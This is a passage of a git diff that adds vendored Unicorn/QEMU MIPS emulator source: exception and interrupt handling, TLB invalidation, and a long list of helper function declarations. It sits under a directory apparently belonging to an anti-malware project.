~0x3ff); + } + env->active_tc.PC += offset; + set_hflags_for_handler(env); + env->CP0_Cause = (env->CP0_Cause & ~(0x1f << CP0Ca_EC)) | (cause << CP0Ca_EC); + break; + default: + qemu_log("Invalid MIPS exception %d. Exiting\n", cs->exception_index); + printf("Invalid MIPS exception %d. Exiting\n", cs->exception_index); + exit(1); + } + if (qemu_log_enabled() && cs->exception_index != EXCP_EXT_INTERRUPT) { + qemu_log("%s: PC " TARGET_FMT_lx " EPC " TARGET_FMT_lx " cause %d\n" + " S %08x C %08x A " TARGET_FMT_lx " D " TARGET_FMT_lx "\n", + __func__, env->active_tc.PC, env->CP0_EPC, cause, + env->CP0_Status, env->CP0_Cause, env->CP0_BadVAddr, + env->CP0_DEPC); + } +#endif + cs->exception_index = EXCP_NONE; +} + +bool mips_cpu_exec_interrupt(CPUState *cs, int interrupt_request) // qq +{ + if (interrupt_request & CPU_INTERRUPT_HARD) { + MIPSCPU *cpu = MIPS_CPU(cs->uc, cs); + CPUMIPSState *env = &cpu->env; + + if (cpu_mips_hw_interrupts_pending(env)) { + /* Raise it */ + cs->exception_index = EXCP_EXT_INTERRUPT; + env->error_code = 0; + mips_cpu_do_interrupt(cs); + return true; + } + } + return false; +} + +#if !defined(CONFIG_USER_ONLY) +void r4k_invalidate_tlb (CPUMIPSState *env, int idx, int use_extra) +{ + MIPSCPU *cpu = mips_env_get_cpu(env); + CPUState *cs; + r4k_tlb_t *tlb; + target_ulong addr; + target_ulong end; + uint8_t ASID = env->CP0_EntryHi & 0xFF; + target_ulong mask; + + tlb = &env->tlb->mmu.r4k.tlb[idx]; + /* The qemu TLB is flushed when the ASID changes, so no need to + flush these entries again. */ + if (tlb->G == 0 && tlb->ASID != ASID) { + return; + } + + if (use_extra && env->tlb->tlb_in_use < MIPS_TLB_MAX) { + /* For tlbwr, we can shadow the discarded entry into + a new (fake) TLB entry, as long as the guest can not + tell that it's there. */ + env->tlb->mmu.r4k.tlb[env->tlb->tlb_in_use] = *tlb; + env->tlb->tlb_in_use++; + return; + } + + /* 1k pages are not supported. 
*/ + mask = tlb->PageMask | ~(((unsigned int)TARGET_PAGE_MASK) << 1); + if (tlb->V0) { + cs = CPU(cpu); + addr = tlb->VPN & ~mask; +#if defined(TARGET_MIPS64) + if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { + addr |= 0x3FFFFF0000000000ULL; + } +#endif + end = addr | (mask >> 1); + while (addr < end) { + tlb_flush_page(cs, addr); + addr += TARGET_PAGE_SIZE; + } + } + if (tlb->V1) { + cs = CPU(cpu); + addr = (tlb->VPN & ~mask) | ((mask >> 1) + 1); +#if defined(TARGET_MIPS64) + if (addr >= (0xFFFFFFFF80000000ULL & env->SEGMask)) { + addr |= 0x3FFFFF0000000000ULL; + } +#endif + end = addr | mask; + while (addr - 1 < end) { + tlb_flush_page(cs, addr); + addr += TARGET_PAGE_SIZE; + } + } +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.h new file mode 100644 index 0000000..1924bf6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-mips/helper.h @@ -0,0 +1,936 @@ +DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) + +DEF_HELPER_3(raise_exception_err, noreturn, env, i32, int) +DEF_HELPER_2(raise_exception, noreturn, env, i32) + +#ifdef TARGET_MIPS64 +DEF_HELPER_4(sdl, void, env, tl, tl, int) +DEF_HELPER_4(sdr, void, env, tl, tl, int) +#endif +DEF_HELPER_4(swl, void, env, tl, tl, int) +DEF_HELPER_4(swr, void, env, tl, tl, int) + +#ifndef CONFIG_USER_ONLY +DEF_HELPER_3(ll, tl, env, tl, int) +DEF_HELPER_4(sc, tl, env, tl, tl, int) +#ifdef TARGET_MIPS64 +DEF_HELPER_3(lld, tl, env, tl, int) +DEF_HELPER_4(scd, tl, env, tl, tl, int) +#endif +#endif + +DEF_HELPER_FLAGS_1(clo, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(clz, TCG_CALL_NO_RWG_SE, tl, tl) +#ifdef TARGET_MIPS64 +DEF_HELPER_FLAGS_1(dclo, TCG_CALL_NO_RWG_SE, tl, tl) +DEF_HELPER_FLAGS_1(dclz, TCG_CALL_NO_RWG_SE, tl, tl) +#endif + +DEF_HELPER_3(muls, tl, env, tl, tl) +DEF_HELPER_3(mulsu, tl, env, tl, tl) +DEF_HELPER_3(macc, tl, env, tl, tl) +DEF_HELPER_3(maccu, tl, env, tl, tl) 
+DEF_HELPER_3(msac, tl, env, tl, tl) +DEF_HELPER_3(msacu, tl, env, tl, tl) +DEF_HELPER_3(mulhi, tl, env, tl, tl) +DEF_HELPER_3(mulhiu, tl, env, tl, tl) +DEF_HELPER_3(mulshi, tl, env, tl, tl) +DEF_HELPER_3(mulshiu, tl, env, tl, tl) +DEF_HELPER_3(macchi, tl, env, tl, tl) +DEF_HELPER_3(macchiu, tl, env, tl, tl) +DEF_HELPER_3(msachi, tl, env, tl, tl) +DEF_HELPER_3(msachiu, tl, env, tl, tl) + +DEF_HELPER_FLAGS_1(bitswap, TCG_CALL_NO_RWG_SE, tl, tl) +#ifdef TARGET_MIPS64 +DEF_HELPER_FLAGS_1(dbitswap, TCG_CALL_NO_RWG_SE, tl, tl) +#endif + +#ifndef CONFIG_USER_ONLY +/* CP0 helpers */ +DEF_HELPER_1(mfc0_mvpcontrol, tl, env) +DEF_HELPER_1(mfc0_mvpconf0, tl, env) +DEF_HELPER_1(mfc0_mvpconf1, tl, env) +DEF_HELPER_1(mftc0_vpecontrol, tl, env) +DEF_HELPER_1(mftc0_vpeconf0, tl, env) +DEF_HELPER_1(mfc0_random, tl, env) +DEF_HELPER_1(mfc0_tcstatus, tl, env) +DEF_HELPER_1(mftc0_tcstatus, tl, env) +DEF_HELPER_1(mfc0_tcbind, tl, env) +DEF_HELPER_1(mftc0_tcbind, tl, env) +DEF_HELPER_1(mfc0_tcrestart, tl, env) +DEF_HELPER_1(mftc0_tcrestart, tl, env) +DEF_HELPER_1(mfc0_tchalt, tl, env) +DEF_HELPER_1(mftc0_tchalt, tl, env) +DEF_HELPER_1(mfc0_tccontext, tl, env) +DEF_HELPER_1(mftc0_tccontext, tl, env) +DEF_HELPER_1(mfc0_tcschedule, tl, env) +DEF_HELPER_1(mftc0_tcschedule, tl, env) +DEF_HELPER_1(mfc0_tcschefback, tl, env) +DEF_HELPER_1(mftc0_tcschefback, tl, env) +DEF_HELPER_1(mfc0_count, tl, env) +DEF_HELPER_1(mftc0_entryhi, tl, env) +DEF_HELPER_1(mftc0_status, tl, env) +DEF_HELPER_1(mftc0_cause, tl, env) +DEF_HELPER_1(mftc0_epc, tl, env) +DEF_HELPER_1(mftc0_ebase, tl, env) +DEF_HELPER_2(mftc0_configx, tl, env, tl) +DEF_HELPER_1(mfc0_lladdr, tl, env) +DEF_HELPER_2(mfc0_watchlo, tl, env, i32) +DEF_HELPER_2(mfc0_watchhi, tl, env, i32) +DEF_HELPER_1(mfc0_debug, tl, env) +DEF_HELPER_1(mftc0_debug, tl, env) +#ifdef TARGET_MIPS64 +DEF_HELPER_1(dmfc0_tcrestart, tl, env) +DEF_HELPER_1(dmfc0_tchalt, tl, env) +DEF_HELPER_1(dmfc0_tccontext, tl, env) +DEF_HELPER_1(dmfc0_tcschedule, tl, env) 
+DEF_HELPER_1(dmfc0_tcschefback, tl, env) +DEF_HELPER_1(dmfc0_lladdr, tl, env) +DEF_HELPER_2(dmfc0_watchlo, tl, env, i32) +#endif /* TARGET_MIPS64 */ + +DEF_HELPER_2(mtc0_index, void, env, tl) +DEF_HELPER_2(mtc0_mvpcontrol, void, env, tl) +DEF_HELPER_2(mtc0_vpecontrol, void, env, tl) +DEF_HELPER_2(mttc0_vpecontrol, void, env, tl) +DEF_HELPER_2(mtc0_vpeconf0, void, env, tl) +DEF_HELPER_2(mttc0_vpeconf0, void, env, tl) +DEF_HELPER_2(mtc0_vpeconf1, void, env, tl) +DEF_HELPER_2(mtc0_yqmask, void, env, tl) +DEF_HELPER_2(mtc0_vpeopt, void, env, tl) +DEF_HELPER_2(mtc0_entrylo0, void, env, tl) +DEF_HELPER_2(mtc0_tcstatus, void, env, tl) +DEF_HELPER_2(mttc0_tcstatus, void, env, tl) +DEF_HELPER_2(mtc0_tcbind, void, env, tl) +DEF_HELPER_2(mttc0_tcbind, void, env, tl) +DEF_HELPER_2(mtc0_tcrestart, void, env, tl) +DEF_HELPER_2(mttc0_tcrestart, void, env, tl) +DEF_HELPER_2(mtc0_tchalt, void, env, tl) +DEF_HELPER_2(mttc0_tchalt, void, env, tl) +DEF_HELPER_2(mtc0_tccontext, void, env, tl) +DEF_HELPER_2(mttc0_tccontext, void, env, tl) +DEF_HELPER_2(mtc0_tcschedule, void, env, tl) +DEF_HELPER_2(mttc0_tcschedule, void, env, tl) +DEF_HELPER_2(mtc0_tcschefback, void, env, tl) +DEF_HELPER_2(mttc0_tcschefback, void, env, tl) +DEF_HELPER_2(mtc0_entrylo1, void, env, tl) +DEF_HELPER_2(mtc0_context, void, env, tl) +DEF_HELPER_2(mtc0_pagemask, void, env, tl) +DEF_HELPER_2(mtc0_pagegrain, void, env, tl) +DEF_HELPER_2(mtc0_wired, void, env, tl) +DEF_HELPER_2(mtc0_srsconf0, void, env, tl) +DEF_HELPER_2(mtc0_srsconf1, void, env, tl) +DEF_HELPER_2(mtc0_srsconf2, void, env, tl) +DEF_HELPER_2(mtc0_srsconf3, void, env, tl) +DEF_HELPER_2(mtc0_srsconf4, void, env, tl) +DEF_HELPER_2(mtc0_hwrena, void, env, tl) +DEF_HELPER_2(mtc0_count, void, env, tl) +DEF_HELPER_2(mtc0_entryhi, void, env, tl) +DEF_HELPER_2(mttc0_entryhi, void, env, tl) +DEF_HELPER_2(mtc0_compare, void, env, tl) +DEF_HELPER_2(mtc0_status, void, env, tl) +DEF_HELPER_2(mttc0_status, void, env, tl) +DEF_HELPER_2(mtc0_intctl, void, env, tl) 
+DEF_HELPER_2(mtc0_srsctl, void, env, tl) +DEF_HELPER_2(mtc0_cause, void, env, tl) +DEF_HELPER_2(mttc0_cause, void, env, tl) +DEF_HELPER_2(mtc0_ebase, void, env, tl) +DEF_HELPER_2(mttc0_ebase, void, env, tl) +DEF_HELPER_2(mtc0_config0, void, env, tl) +DEF_HELPER_2(mtc0_config2, void, env, tl) +DEF_HELPER_2(mtc0_config4, void, env, tl) +DEF_HELPER_2(mtc0_config5, void, env, tl) +DEF_HELPER_2(mtc0_lladdr, void, env, tl) +DEF_HELPER_3(mtc0_watchlo, void, env, tl, i32) +DEF_HELPER_3(mtc0_watchhi, void, env, tl, i32) +DEF_HELPER_2(mtc0_xcontext, void, env, tl) +DEF_HELPER_2(mtc0_framemask, void, env, tl) +DEF_HELPER_2(mtc0_debug, void, env, tl) +DEF_HELPER_2(mttc0_debug, void, env, tl) +DEF_HELPER_2(mtc0_performance0, void, env, tl) +DEF_HELPER_2(mtc0_taglo, void, env, tl) +DEF_HELPER_2(mtc0_datalo, void, env, tl) +DEF_HELPER_2(mtc0_taghi, void, env, tl) +DEF_HELPER_2(mtc0_datahi, void, env, tl) + +#if defined(TARGET_MIPS64) +DEF_HELPER_2(dmtc0_entrylo0, void, env, i64) +DEF_HELPER_2(dmtc0_entrylo1, void, env, i64) +#endif + +/* MIPS MT functions */ +DEF_HELPER_2(mftgpr, tl, env, i32) +DEF_HELPER_2(mftlo, tl, env, i32) +DEF_HELPER_2(mfthi, tl, env, i32) +DEF_HELPER_2(mftacx, tl, env, i32) +DEF_HELPER_1(mftdsp, tl, env) +DEF_HELPER_3(mttgpr, void, env, tl, i32) +DEF_HELPER_3(mttlo, void, env, tl, i32) +DEF_HELPER_3(mtthi, void, env, tl, i32) +DEF_HELPER_3(mttacx, void, env, tl, i32) +DEF_HELPER_2(mttdsp, void, env, tl) +DEF_HELPER_0(dmt, tl) +DEF_HELPER_0(emt, tl) +DEF_HELPER_1(dvpe, tl, env) +DEF_HELPER_1(evpe, tl, env) +#endif /* !CONFIG_USER_ONLY */ + +/* microMIPS functions */ +DEF_HELPER_4(lwm, void, env, tl, tl, i32) +DEF_HELPER_4(swm, void, env, tl, tl, i32) +#ifdef TARGET_MIPS64 +DEF_HELPER_4(ldm, void, env, tl, tl, i32) +DEF_HELPER_4(sdm, void, env, tl, tl, i32) +#endif + +DEF_HELPER_2(fork, void, tl, tl) +DEF_HELPER_2(yield, tl, env, tl) + +/* CP1 functions */ +DEF_HELPER_2(cfc1, tl, env, i32) +DEF_HELPER_4(ctc1, void, env, tl, i32, i32) + 
+DEF_HELPER_2(float_cvtd_s, i64, env, i32) +DEF_HELPER_2(float_cvtd_w, i64, env, i32) +DEF_HELPER_2(float_cvtd_l, i64, env, i64) +DEF_HELPER_2(float_cvtl_d, i64, env, i64) +DEF_HELPER_2(float_cvtl_s, i64, env, i32) +DEF_HELPER_2(float_cvtps_pw, i64, env, i64) +DEF_HELPER_2(float_cvtpw_ps, i64, env, i64) +DEF_HELPER_2(float_cvts_d, i32, env, i64) +DEF_HELPER_2(float_cvts_w, i32, env, i32) +DEF_HELPER_2(float_cvts_l, i32, env, i64) +DEF_HELPER_2(float_cvts_pl, i32, env, i32) +DEF_HELPER_2(float_cvts_pu, i32, env, i32) +DEF_HELPER_2(float_cvtw_s, i32, env, i32) +DEF_HELPER_2(float_cvtw_d, i32, env, i64) + +DEF_HELPER_3(float_addr_ps, i64, env, i64, i64) +DEF_HELPER_3(float_mulr_ps, i64, env, i64, i64) + +DEF_HELPER_FLAGS_1(float_class_s, TCG_CALL_NO_RWG_SE, i32, i32) +DEF_HELPER_FLAGS_1(float_class_d, TCG_CALL_NO_RWG_SE, i64, i64) + +#define FOP_PROTO(op) \ +DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ +DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) +FOP_PROTO(maddf) +FOP_PROTO(msubf) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ +DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) +FOP_PROTO(max) +FOP_PROTO(maxa) +FOP_PROTO(min) +FOP_PROTO(mina) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_2(float_ ## op ## l_s, i64, env, i32) \ +DEF_HELPER_2(float_ ## op ## l_d, i64, env, i64) \ +DEF_HELPER_2(float_ ## op ## w_s, i32, env, i32) \ +DEF_HELPER_2(float_ ## op ## w_d, i32, env, i64) +FOP_PROTO(round) +FOP_PROTO(trunc) +FOP_PROTO(ceil) +FOP_PROTO(floor) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ +DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) +FOP_PROTO(sqrt) +FOP_PROTO(rsqrt) +FOP_PROTO(recip) +FOP_PROTO(rint) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_1(float_ ## op ## _s, i32, i32) \ +DEF_HELPER_1(float_ ## op ## _d, i64, i64) \ +DEF_HELPER_1(float_ ## op ## _ps, i64, i64) +FOP_PROTO(abs) +FOP_PROTO(chs) 
+#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_2(float_ ## op ## _s, i32, env, i32) \ +DEF_HELPER_2(float_ ## op ## _d, i64, env, i64) \ +DEF_HELPER_2(float_ ## op ## _ps, i64, env, i64) +FOP_PROTO(recip1) +FOP_PROTO(rsqrt1) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_3(float_ ## op ## _s, i32, env, i32, i32) \ +DEF_HELPER_3(float_ ## op ## _d, i64, env, i64, i64) \ +DEF_HELPER_3(float_ ## op ## _ps, i64, env, i64, i64) +FOP_PROTO(add) +FOP_PROTO(sub) +FOP_PROTO(mul) +FOP_PROTO(div) +FOP_PROTO(recip2) +FOP_PROTO(rsqrt2) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_4(float_ ## op ## _s, i32, env, i32, i32, i32) \ +DEF_HELPER_4(float_ ## op ## _d, i64, env, i64, i64, i64) \ +DEF_HELPER_4(float_ ## op ## _ps, i64, env, i64, i64, i64) +FOP_PROTO(madd) +FOP_PROTO(msub) +FOP_PROTO(nmadd) +FOP_PROTO(nmsub) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_4(cmp_d_ ## op, void, env, i64, i64, int) \ +DEF_HELPER_4(cmpabs_d_ ## op, void, env, i64, i64, int) \ +DEF_HELPER_4(cmp_s_ ## op, void, env, i32, i32, int) \ +DEF_HELPER_4(cmpabs_s_ ## op, void, env, i32, i32, int) \ +DEF_HELPER_4(cmp_ps_ ## op, void, env, i64, i64, int) \ +DEF_HELPER_4(cmpabs_ps_ ## op, void, env, i64, i64, int) +FOP_PROTO(f) +FOP_PROTO(un) +FOP_PROTO(eq) +FOP_PROTO(ueq) +FOP_PROTO(olt) +FOP_PROTO(ult) +FOP_PROTO(ole) +FOP_PROTO(ule) +FOP_PROTO(sf) +FOP_PROTO(ngle) +FOP_PROTO(seq) +FOP_PROTO(ngl) +FOP_PROTO(lt) +FOP_PROTO(nge) +FOP_PROTO(le) +FOP_PROTO(ngt) +#undef FOP_PROTO + +#define FOP_PROTO(op) \ +DEF_HELPER_3(r6_cmp_d_ ## op, i64, env, i64, i64) \ +DEF_HELPER_3(r6_cmp_s_ ## op, i32, env, i32, i32) +FOP_PROTO(af) +FOP_PROTO(un) +FOP_PROTO(eq) +FOP_PROTO(ueq) +FOP_PROTO(lt) +FOP_PROTO(ult) +FOP_PROTO(le) +FOP_PROTO(ule) +FOP_PROTO(saf) +FOP_PROTO(sun) +FOP_PROTO(seq) +FOP_PROTO(sueq) +FOP_PROTO(slt) +FOP_PROTO(sult) +FOP_PROTO(sle) +FOP_PROTO(sule) +FOP_PROTO(or) +FOP_PROTO(une) +FOP_PROTO(ne) +FOP_PROTO(sor) +FOP_PROTO(sune) +FOP_PROTO(sne) +#undef 
FOP_PROTO + +/* Special functions */ +#ifndef CONFIG_USER_ONLY +DEF_HELPER_1(tlbwi, void, env) +DEF_HELPER_1(tlbwr, void, env) +DEF_HELPER_1(tlbp, void, env) +DEF_HELPER_1(tlbr, void, env) +DEF_HELPER_1(tlbinv, void, env) +DEF_HELPER_1(tlbinvf, void, env) +DEF_HELPER_1(di, tl, env) +DEF_HELPER_1(ei, tl, env) +DEF_HELPER_1(eret, void, env) +DEF_HELPER_1(deret, void, env) +#endif /* !CONFIG_USER_ONLY */ +DEF_HELPER_1(rdhwr_cpunum, tl, env) +DEF_HELPER_1(rdhwr_synci_step, tl, env) +DEF_HELPER_1(rdhwr_cc, tl, env) +DEF_HELPER_1(rdhwr_ccres, tl, env) +DEF_HELPER_2(pmon, void, env, int) +DEF_HELPER_1(wait, void, env) + +/* Loongson multimedia functions. */ +DEF_HELPER_FLAGS_2(paddsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddush, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(paddb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(psubsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubush, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubsb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubusb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psubb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pshufh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(packsswh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(packsshb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(packushb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(punpcklhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpckhhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpcklbh, TCG_CALL_NO_RWG_SE, i64, i64, 
i64) +DEF_HELPER_FLAGS_2(punpckhbh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpcklwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(punpckhwd, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pavgh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pavgb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmaxsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pminsh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmaxub, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pminub, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pcmpeqw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpgtw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpeqh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpgth, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpeqb, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pcmpgtb, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(psllw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psllh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psrlw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psrlh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psraw, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(psrah, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pmullh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmulhh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmulhuh, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(pmaddhw, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(pasubub, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_1(biadd, TCG_CALL_NO_RWG_SE, i64, i64) +DEF_HELPER_FLAGS_1(pmovmskb, TCG_CALL_NO_RWG_SE, i64, i64) + +/*** MIPS DSP ***/ +/* DSP Arithmetic Sub-class insns */ +DEF_HELPER_FLAGS_3(addq_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addq_s_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(addq_qh, 0, 
tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addq_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(addq_s_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(addq_pw, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addq_s_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(addu_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(adduh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(adduh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(addu_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(addqh_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(addqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(addqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(addqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(addu_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(adduh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(adduh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(addu_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addu_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(subq_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subq_s_ph, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(subq_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subq_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(subq_s_w, 0, tl, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(subq_pw, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subq_s_pw, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(subu_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_qb, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(subuh_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subuh_r_qb, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(subu_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_ph, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(subqh_ph, TCG_CALL_NO_RWG_SE, 
tl, tl, tl) +DEF_HELPER_FLAGS_2(subqh_r_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subqh_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subqh_r_w, TCG_CALL_NO_RWG_SE, tl, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_3(subu_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_ob, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(subuh_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(subuh_r_ob, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(subu_qh, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(subu_s_qh, 0, tl, tl, tl, env) +#endif +DEF_HELPER_FLAGS_3(addsc, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_3(addwc, 0, tl, tl, tl, env) +DEF_HELPER_FLAGS_2(modsub, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_1(raddu_w_qb, TCG_CALL_NO_RWG_SE, tl, tl) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_1(raddu_l_ob, TCG_CALL_NO_RWG_SE, tl, tl) +#endif +DEF_HELPER_FLAGS_2(absq_s_qb, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_ph, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_w, 0, tl, tl, env) +#if defined(TARGET_MIPS64) +DEF_HELPER_FLAGS_2(absq_s_ob, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_qh, 0, tl, tl, env) +DEF_HELPER_FLAGS_2(absq_s_pw, 0, tl, tl, env) +#endif +DEF_HELPER_FLAGS_2(precr_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_2(precrq_qb_ph, TCG_CALL_NO_RWG_SE, tl, tl, tl) +DEF_HELPER_FLAGS_3(precr_sra_ph_w, TCG_CALL_NO_RWG_SE, + tl, i32, tl, tl) +DEF_HELPER_FLAGS_3(precr_sra_r_ph_w, TCG_CALL_NO_RWG_SE, 